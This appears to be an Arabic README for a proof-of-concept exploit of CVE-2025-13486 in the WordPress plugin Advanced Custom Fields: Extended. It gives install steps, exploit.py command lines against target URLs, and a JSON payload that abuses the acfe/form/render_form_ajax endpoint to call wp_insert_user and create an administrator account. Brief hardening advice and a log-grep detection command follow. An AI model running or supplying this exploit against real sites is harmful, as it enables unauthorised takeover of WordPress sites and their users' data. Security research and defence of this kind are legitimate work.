
ثغرة في إضافة ووردبريس Advanced Custom Fields Extended (ACFE) لتنفيذ التعليمات البرمجية عن بعد - إنشاء مشرف
استغلال إثبات المفهوم لـ CVE-2025-13486، ثغرة خطيرة في ملحق الحقول المخصصة المتقدمة: الموسعة (ACFE) لووردبريس تسمح بتنفيذ التعليمات البرمجية عن بعد مما يؤدي إلى تصعيد الامتيازات.
| الجانب | التفاصيل |
|---|---|
| معرف CVE | CVE-2025-13486 |
| الملحق | Advanced Custom Fields: Extended (ACFE) |
| النوع | تنفيذ التعليمات البرمجية عن بعد → تصعيد الامتيازات |
| مستوى الخطر | حرج |
| الإصدارات المتأثرة | إصدارات ACFE الضعيفة (الإصدارات المحددة غير معروفة) |
| درجة CVSS | 9.8 حرج |
| تاريخ الاكتشاف | 2025 |
| المؤلف | 0xgh057r3c0n |
⚠️ تحذير: هذه الأداة مخصصة فقط للاختبارات الأمنية المصرح بها والأغراض التعليمية.
✅ الاستخدام المسموح به:
❌ الاستخدام المحظور:
المؤلف غير مسؤول عن أي إساءة استخدام لهذه الأداة. احرص دائمًا على الحصول على إذن كتابي مناسب قبل اختبار أي نظام.
print_rwp_insert_userrequests# استنساخ المستودع
git clone https://github.com/0xgh057r3c0n/CVE-2025-13486.git
cd CVE-2025-13486
# تثبيت التبعيات
pip install requests
# بديل: التثبيت من requirements.txt
pip install -r requirements.txt
# جعل البرنامج النصي قابلاً للتنفيذ (لينكس/ماك)
chmod +x exploit.py
أنشئ ملف requirements.txt:
requests>=2.25.1
python3 exploit.py --url <TARGET_URL> [OPTIONS]
python3 exploit.py --url http://target.com --verify
python3 exploit.py --url https://target.com
python3 exploit.py --url https://target.com \
--user backup_admin \
--password "P@ssw0rd123!" \
--email [email protected]
python3 exploit.py --url target.com --verify
يستغل هذا الاستغلال معالجة غير صحيحة للدوال في نقطة النهاية acfe/form/render_form_ajax لملحق ACFE، مما يسمح للمهاجمين باستدعاء دوال PHP عشوائية.
1. التحقق من URL → كشف تلقائي لـ HTTP/HTTPS
2. استخراج nonce → مسح الصفحة بحثًا عن nonce الخاص بـ ACF
3. بناء الحمولة → إنشاء طلب AJAX ضار
4. تنفيذ الطلب → إرسال الاستغلال إلى الهدف
5. تحليل النتيجة → التحقق من مؤشرات النجاح
// نمط الكود الضعيف في ACFE
$result = call_user_func_array($form['render'], array($form));
// هيكل حمولة الاستغلال
{
"action": "acfe/form/render_form_ajax",
"nonce": "extracted_nonce",
"form[render]": "wp_insert_user",
"form[user_login]": "attacker_user",
"form[user_pass]": "attacker_pass",
"form[user_email]": "[email protected]",
"form[role]": "administrator"
}
# ملحقات الأمان الموصى بها
1. Wordfence Security
2. Sucuri Security
3. iThemes Security
4. All In One WP Security
# حماية على مستوى الخادم
- تنفيذ تحديد المعدل
- تمكين قواعد mod_security
- استخدام Cloudflare أو CDN مشابه
- تدقيقات أمنية منتظمة
/wp-admin/admin-ajax.phpaction=acfe/form/render_form_ajaxwp_insert_user عبر AJAX# سجلات Apache
grep "admin-ajax.php" /var/log/apache2/access.log | grep "acfe/form"
# سجلات تصحيح ووردبريس
define('WP_DEBUG', true);
define('WP_DEBUG_LOG', true);
git checkout -b feature/improvement)git commit -am 'إضافة ميزة جديدة')git push origin feature/improvement)يرجى الإبلاغ عن الأخطاء والمشكلات عبر:
CVE-2025-13486/
├── exploit.py # البرنامج النصي الرئيسي للاستغلال
├── README.md # هذا التوثيق
├── requirements.txt # تبعيات Python
├── LICENSE # ملف ترخيص MIT
├── examples/ # أمثلة الاستخدام
│ ├── verification.txt
│ └── exploitation.txt
└── tests/ # نصوص الاختبار
├── test_verify.py
└── test_exploit.py
0xgh057r3c0n - باحث أمني
هذا المشروع مرخص بموجب رخصة MIT - راجع ملف LICENSE للحصول على التفاصيل.
تم بناؤه بـ ❤️ لمجتمع الأمن
⚠️ استخدم بمسؤولية وأخلاقية ⚠️
| الخيار | الوصف | مطلوب | الافتراضي |
|---|
-u, --url | عنوان URL الخاص بالووردبريس المستهدف | نعم | - |
--verify | تحقق فقط، لا استغلال | لا | False |
--user | اسم مستخدم مخصص للمسؤول | لا | admin_XXXXX |
--password | كلمة مرور مخصصة للمسؤول | لا | 12 حرفًا عشوائيًا |
--email | بريد إلكتروني مخصص للمسؤول | لا | [email protected] |